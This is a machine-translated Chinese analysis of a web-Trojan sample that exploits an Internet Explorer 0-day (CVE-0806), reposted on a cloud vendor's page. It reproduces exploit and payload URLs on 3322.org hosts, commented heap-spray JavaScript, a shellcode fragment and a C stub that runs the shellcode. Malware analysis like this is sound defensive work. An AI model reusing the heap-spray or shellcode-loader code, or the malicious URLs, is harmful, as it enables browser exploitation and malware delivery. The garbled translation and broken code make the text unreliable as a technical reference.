Ie0dayCVE0806 network horse sample analysis

Source: Internet
Author: User

[Title]: Ie0dayCVE0806 network horse sample analysis
[Author]: Quan Ge (http://riusksk.blogbus.com)

Analysis tools:

MDecoder 0.66

Edit Plus 3.01

FreShow

Vvc 6.0

Ollydb g 1.10
Sample Source:

Web site (Anhui News Network) implanted by hackers Trojan http://log.mtian.net /? P = 1152001
Analysis result:
Log By Mdecoder

[Root] http://www.ah.chinanews.com.cn/GuestBook/Images/con.wtxlj871/wenda./lpt9.mqhna976.asp (Changan car how about this stock? What will happen in the future? -- Stock --)

[Exp] http://1029a9.3322.org: 225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Script] http://1029a9.3322.org: 225/yy2/mj. js

[Virus] http://231ad.3322.org: 225/yy2/no.exe

[Exp] http://1029a9.3322.org: 225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Exp] http://1029a9.3322.org: 225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Script] http://js.160ads.com/ I .js

[Script] http://js.160ads.com/+s (sr) +

[Iframe] http://js.160ads.com/+s (sr) +
Code Analysis:
Trojans:


Exploit code analysis:
Index.htm:

");

}

// -->

 



// Set the hide button

// Hanging malicious script http://1029a9.3322.org: 225/yy2/mj. js





Mj. js:

Function auc2 (){

A3 = new Array (); // create an array object Array, and these dynamically applied objects/variables will be allocated to the heap.

Var a5 = 0x86000-(a4.length * 2); // 536KB minus the number of shellcode bytes, mainly used to calculate the number of bytes required for each injection block in addition to shellcode. nop is used to fill in

Var LFlwBa = unescape (% u0c0c % u0c0c );

While (LFlwBa. length

LFlwBa + = LFlwBa; // fill each injection block with 0c0c0c0c except shellcode

};

Var a6 = LFlwBa. substring (0, a5/2 );

Delete LFlwBa;

For (I = 0; I <270; I ++ ){

A3 [I] = a6 + a6 + a4; // fill the memory with a series of injection blocks including shellcode to implement heap spary

}

}

Shellcode Analysis

First, remove the connector "+" from the shellcode part, and then use FreShow to execute ESC decoding:

...... Omitted content ...... XEAxEAxEAxEAxEAxEAxEA

Use VC to write the following code:

Int main ()

{

Char shellcode [] = "Export xbcxe4x55xf2xbfxbdxbdx5fx44x3cx51xbdxbcxbdxbdxbdx36x61 ...... Omitted content ...... Success ";

_ Asm {

Lea eax, shellcode

Push eax

Ret

}

Return 0;

}

Compile it into a program with VC, then load the reverse analysis with OD, F8 to shellcode and then:

0012 FBAC 58 POP EAX

0012 FBAD 58 POP EAX

0012 FBAE 58 POP EAX

0012 FBAF 58 POP EAX

0012FBB0 EB 10

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.